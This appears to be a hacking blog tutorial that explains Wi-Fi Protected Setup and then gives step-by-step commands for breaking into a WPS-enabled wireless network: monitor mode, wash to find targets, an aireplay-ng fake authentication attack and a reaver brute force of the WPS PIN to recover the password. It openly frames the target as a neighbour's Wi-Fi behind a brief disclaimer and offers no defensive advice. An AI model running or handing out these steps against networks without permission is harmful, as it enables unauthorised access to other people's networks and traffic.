EXPLOITING WPS; Hack a WPS enabled WIFI using REAVER and FAKE AUTHENTICATION
Hey Folks, whenever a newbie hacker tries to starts learning about hacking. The very first thing one may try is to hack and get their neighbor’s WIFI password. With that being said lets jump in and learn what is WPS ? How it works? How to get a WIFI password by exploiting WPS?
WARNING: The sole purpose of this write-up is to educate readers about hacking and security concepts. Writer or the publisher does not motivate anyone to use knowledge shared here for unethical purposes.
In this blog we are going to learn how to exploit a feature present in modern routers i.e WPS (WIFI Protected Setup)
What is WPS?
WPS stands for WIFI Protected Setup. It is a feature that is used with WPA & WPA2 (WIFI Protected Access & WIFI Protected Access II).
It is a wireless security standard which aims to make the process to establish connection with a Wireless Access Point using WPA/WPA2 encryption faster and easier.
NOTE: WPS works only with wireless access points which uses WPA/WPA2 encryption to encrypt their passwords.
HOW WPS WORKS?
WPS is a wireless security standard which helps to connect to access point with out using actual PASSWORD.
It has two modes of operation
- PIN
- PBC (Push Button Configuration)
When Access Point is setup up to used pin based authentication, used needs to setup a pin which will be used for authentication. User who wants to connect to the network can now use this WPS pin to connect to the network without using the actual password.
However when PBC mode is used user has to push a button on both client and access point, that button can be virtual as well as physical. When that button is pressed access point will switch to discovery mode and will authenticate the device trying to connect. On most of the devices discovery mode turns off as soon as the new device connects or after time limit set by the manufacturer of the device (normally 2 minutes or less).
Exploiting WPS
Now its time to jump to the fun stuff which is how to exploit WPS and gain access to a wireless network without password. But before we dive in here’s a note for you
NOTE: This method will only work if WPS is enabled on the access point and is configured not to use PCB, which means authentication should be done using WPS pin.
REQUIREMENTS: A KALI LINUX machine, and a wireless network adapter which supports monitor mode.
WPS pin is an eight digit number which is not a really big number. With use of a modern computer we can try all the possible for WPS within a short time, which makes it vulnerable to statistical attacks. Once we get the correct WPS pin, It can be used to compute actual password.
To do this process we need to follow a sequence of steps which are:
Step 1: Switch to monitor mode on wireless adapter
To switch to monitor mode fire the following commands in linux terminal
ifconfig [Name of network interface] down
iwconfig [Name of network interface] mode monitor
ifconfig [Name of network interface] up
Step 2: Find Access Points with WPS enabled
To find access points with WPS enabled fire the following commands in linux terminal.
wash -- interface [Name of network interface]
Step 3: Getting associated with target network using fake authentication attack
To launch a fake authentication fire following commands in linux terminal
aireplay-ng -- fakeauth 30 -a [Target device’s MAC] -h [Network interface’s MAC] [Name of network interface]
“30 after fakeauth signifies that this attack will be launched after every 30 seconds. keep this attack running in a separate terminal”
Step 4: Brute force WPS pins using REAVER
To brute force WPS pins fire the following commands in new linux terminal with fakeauth running on other terminal.
reaver --bssid [Target device’s MAC] --channel [Target device’s channel] --interface [Name of network interface] -vvv --no-associate
“-vvv is for verbose; --no-associate tells reaver to not to associate with target network”
Its better to not get associated with target network using reaver because it usually fails in doing that more over we are already associated with target network by using fake authentication. After successful completion of the attack reaver will return with the correct WPS pin and actual password
NOTE: Incase reaver doesn’t work and return with an error try to use it’s old version, as current version contains some unfixed bugs.
If you are interested in learning more about cybersecurity follow i.m.pratikdabhi on Instagram
